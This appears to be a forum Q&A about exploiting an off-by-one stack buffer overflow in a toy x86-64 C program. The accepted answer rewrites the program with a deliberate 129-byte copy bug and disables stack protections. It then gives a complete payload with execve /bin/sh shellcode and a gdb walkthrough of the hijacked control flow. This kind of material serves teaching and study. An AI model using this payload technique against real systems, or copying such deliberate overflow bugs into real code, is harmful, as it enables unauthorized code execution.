# Offbyone buffer overflow NULL byte in payload

Tags: c, reverse-engineering, exploit

So I was trying Offbyone Buffer overflow with the help of this following simple  code

```
#include <string.h>

void cpy(char *x){
char buf[128]="";
strncat(buf,x,sizeof(buf));

}
int main(int argc, char **argv)
{

    cpy(argv[1]);

}
```

As this diagram depicts how an Offbyone buffer over flow works

[image]

Taken from : https://www.sans.org/reading-room/whitepapers/threats/buffer-overflows-dummies-481

Here is the Disassembly of main and cpy 
[image]

[image]

**Here is the payload that I used**
[image]

**Memory dumps**

[image]

So using the buffer , in the Cpy stack frame i change the value of the saved RBP's **least significant byte** to **00** ( *because of the Offbyone overflow achieved by providing exactly 128byte input*  )

As you can see the address **0x7fffffffe177** has stored EBP whose value is changed from **0x7fffffffe190** to **0x7fffffffe100**

So I went ahead and had the starting address of my payload at the address **0x7fffffffe10F** *which is also the return address of main*
which is supposed to be **0xffffe110    0x00007fff** instead of **0xffffe110    0x90907fff** but since we shouldn't have 00 in payload  I am not able to set the return address because since it's an 64bit address is of 8byte long   **0xffffe110 0x00007fff**

So how exactly should we have the return address here ? 
And since the image of the memory dump, in break point 1 , its the cpy function frame why is argc  and argv [] on the top of the stack ? 
I am new to Exploit writing and all the help will be much appreciated .

Comment: Wait, you're undergoing an exploit writing tutorial while compiling and running your exploits as root? Great way to eventually pwn yourself.

Comment: Its running in an virtual environment so no problem :v

Answer (score 7, accepted):

So let's start with a description of the trick that can be used to set the desired return address value without passing zero bytes in payload.

I've changed your code a little bit to make it easier to do the trick. Here is new code:

```
#include <string.h>

int i;

void cpy(char *x) {
    char buf[128];
    for (i = 0; i <= 128; ++i) {
        buf[i] = x[i];
    }
}

int main(int argc, char **argv) {
    cpy(argv[1]);
    return 0;
}
```

The main difference is that now we can control the value of the less significant byte of saved `rbp`. In your example we only can set it to zero.

So here the stack frame of our `cpy` function:

[image]

`@rbp` - saved base stack pointer of `main` function

`@rsp` - stack pointer at the start of `cpy` function (right after `push rbp`)

The trick is that we overwrite the last byte in such way that `@rbp = @rsp - 8`. So when we return from `main` function `$rbp` will be equal to `@rsp - 8` and thus return address will be 8 bytes before `@rsp - 8` i.e. also `@rsp - 8`!

After return from `main` we will jump to `@rsp - 8`. So now we simply put `jmp` to shellcode at this address and we are done:

[image]

But in your original example this trick can't be done because we can't control value of less significant byte of `@rbp`.

It should also be noted that this trick will not work if `@rbp` and `@rsp` differ more than in one last byte.

And finally here is exploit.

Compile code with executable stack and without stack protection:

```
$ gcc test.c -o test -z execstack -fno-stack-protector
```

Get byte code for our `jmp` to shellcode:

```
$ rasm2 -a x86 -b 64 'jmp -0x50'
ebae
```

Exploit under `gdb`:

```
$ gdb --args test $(python -c 'print "\x90" * 91 + "\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05" + "\xeb\xb8" + "a" * 6 + "\xc8"')

>>> b cpy
>>> b *cpy+90
>>> r
Breakpoint 1, 0x00000000004004aa in cpy ()
```

So here is saved `rbp`:

```
>>> x/1gx $rbp
0x7fffffffd3d0: 0x00007fffffffd3f0
```

Here is `rsp` at the start of `cpy` function:

```
>>> p/x $rsp
$1 = 0x7fffffffd3d0
```

The value of `rbp` which we want to get after return from `cpy` (that's why last byte of payload is `\xc8`)

```
>>> p/x $rsp - 8
$2 = 0x7fffffffd3c8
```

Continue to the end of `cpy`:

```
>>> c
Breakpoint 2, 0x0000000000400500 in cpy ()
```

Asm code of `cpy`:

```
>>> disassemble cpy
Dump of assembler code for function cpy:
     0x00000000004004a6 <+0>:     push   rbp
     0x00000000004004a7 <+1>:     mov    rbp,rsp
     0x00000000004004aa <+4>:     sub    rsp,0x10
     0x00000000004004ae <+8>:     mov    QWORD PTR [rbp-0x88],rdi
     0x00000000004004b5 <+15>:    mov    DWORD PTR [rip+0x20046d],0x0        # 0x60092c <i>
     0x00000000004004bf <+25>:    jmp    0x4004f2 <cpy+76>
     0x00000000004004c1 <+27>:    mov    eax,DWORD PTR [rip+0x200465]        # 0x60092c <i>
     0x00000000004004c7 <+33>:    mov    edx,DWORD PTR [rip+0x20045f]        # 0x60092c <i>
     0x00000000004004cd <+39>:    movsxd rcx,edx
     0x00000000004004d0 <+42>:    mov    rdx,QWORD PTR [rbp-0x88]
     0x00000000004004d7 <+49>:    add    rdx,rcx
     0x00000000004004da <+52>:    movzx  edx,BYTE PTR [rdx]
     0x00000000004004dd <+55>:    cdqe
     0x00000000004004df <+57>:    mov    BYTE PTR [rbp+rax*1-0x80],dl
     0x00000000004004e3 <+61>:    mov    eax,DWORD PTR [rip+0x200443]        # 0x60092c <i>
     0x00000000004004e9 <+67>:    add    eax,0x1
     0x00000000004004ec <+70>:    mov    DWORD PTR [rip+0x20043a],eax        # 0x60092c <i>
     0x00000000004004f2 <+76>:    mov    eax,DWORD PTR [rip+0x200434]        # 0x60092c <i>
     0x00000000004004f8 <+82>:    cmp    eax,0x80
     0x00000000004004fd <+87>:    jle    0x4004c1 <cpy+27>
     0x00000000004004ff <+89>:    nop
  => 0x0000000000400500 <+90>:    leave
     0x0000000000400501 <+91>:    ret
End of assembler dump.
```

Value of `rbp` after `leave`:

```
>>> ni
>>> p/x $rbp
$1 = 0x7fffffffd3c8
```

Execute till the end of `main`:

```
>>> ni
>>> ni
>>> ni
>>> disassemble
Dump of assembler code for function main:
     0x0000000000400502 <+0>:     push   rbp
     0x0000000000400503 <+1>:     mov    rbp,rsp
     0x0000000000400506 <+4>:     sub    rsp,0x10
     0x000000000040050a <+8>:     mov    DWORD PTR [rbp-0x4],edi
     0x000000000040050d <+11>:    mov    QWORD PTR [rbp-0x10],rsi
     0x0000000000400511 <+15>:    mov    rax,QWORD PTR [rbp-0x10]
     0x0000000000400515 <+19>:    add    rax,0x8
     0x0000000000400519 <+23>:    mov    rax,QWORD PTR [rax]
     0x000000000040051c <+26>:    mov    rdi,rax
     0x000000000040051f <+29>:    call   0x4004a6 <cpy>
     0x0000000000400524 <+34>:    mov    eax,0x0
     0x0000000000400529 <+39>:    leave
  => 0x000000000040052a <+40>:    ret
End of assembler dump.
>>> ni
```

Now we at `@rsp - 8` and here is our `jmp` to shellcode:

```
>>> disassemble $rip,+2
Dump of assembler code from 0x7fffffffd3c8 to 0x7fffffffd3ca:
=> 0x00007fffffffd3c8:  jmp    0x7fffffffd382
End of assembler dump.
```

And finally shellcode:

```
>>> ni
>>> disassemble $rip,+0x50
Dump of assembler code from 0x7fffffffd382 to 0x7fffffffd3d2:
=> 0x00007fffffffd382:  nop
   0x00007fffffffd383:  nop
   0x00007fffffffd384:  nop
   0x00007fffffffd385:  nop
   ...
   0x00007fffffffd3ab:  xor    rdi,rdi
   0x00007fffffffd3ae:  push   rdi
   0x00007fffffffd3af:  push   rdi
   0x00007fffffffd3b0:  pop    rsi
   0x00007fffffffd3b1:  pop    rdx
   0x00007fffffffd3b2:  movabs rdi,0x68732f6e69622f2f
   0x00007fffffffd3bc:  shr    rdi,0x8
   0x00007fffffffd3c0:  push   rdi
   0x00007fffffffd3c1:  push   rsp
   0x00007fffffffd3c2:  pop    rdi
   0x00007fffffffd3c3:  push   0x3b
   0x00007fffffffd3c5:  pop    rax
   0x00007fffffffd3c6:  syscall
```

Comment: Haha Nice answer :D , thanks for taking time to explain this .

Comment: In cases where main function does not return, instead there are only exit() calls, will this attack fail?